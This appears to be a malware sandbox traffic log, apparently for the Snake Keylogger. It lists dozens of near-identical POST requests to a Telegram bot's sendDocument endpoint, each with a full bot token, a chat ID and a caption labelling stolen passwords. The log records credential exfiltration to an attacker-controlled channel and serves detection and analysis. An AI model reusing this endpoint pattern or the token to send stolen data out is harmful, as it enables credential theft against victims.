Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcef7eb6b6afe8Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcefe818514343Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf03db3dd61daHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf09d185123c2Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf0f40df942c2Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf17a3acb6994Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf1d37b977030Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf2245aff2ed4Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf26c929e065dHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf2b3164b9386Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf4c10f13b819Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf51324ab0cc4Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf570fe652fbfHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf5c1e974e0c1Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf7ea90d9cc3dHost: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf8990a312940Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9086c9c212bHost: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf95a72979d06Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9ac59ba2b7bHost: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9ff7eb9cfd7Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa4a489d1784Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa9be8e3d3a4Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfaebff733d3cHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfb3d74a07ef1Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfb71bb175392Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfbbbebbd6c73Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfc0bb3f6adf3Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfc5dd9d17be4Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd011f8a276c68Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd015482333e8dHost: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd01a2be2e504bHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd01f3f5b901aaHost: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd026a531c5b05Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd02be3a529e52Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd03130094d087Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd038bba82bd16Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd03cc8c45aec3Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0426a2e8f167Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0477f2d17d84Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd04cd8c845f88Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd05245e6271d3Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0567912c48b5Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd06087186fd40Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd066f4ea4de0bHost: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd06ce01d0608bHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd08fbf92642aeHost: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0a4f7852c7fdHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ad8215b06bbHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b4a4b3f4a98Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0bb3f9b747b0Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0c074be0e0b4Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0cb1bc016dadHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0d0d033d72a3Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0d5d287e471cHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dae88b38925Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dfe7e0ed492Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ffe117a5e37Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10546c775586Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10bcc08ff78fHost: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11117b97e492Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1165e66f96a5Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11bbbd263db8Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd120b60779b87Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd125ccd940545Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd12ab3d99a9feHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd12ede91e4116Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd13514572cb14Host: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd13ad63271467Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd14025a1c1cdcHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd144bd6ecd266Host: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd149eedb82b6cHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd15016b1ea21cHost: api.telegram.orgContent-Length: 547
Source: global traffic HTTP traffic detected: POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd16f86a2bc2cdHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
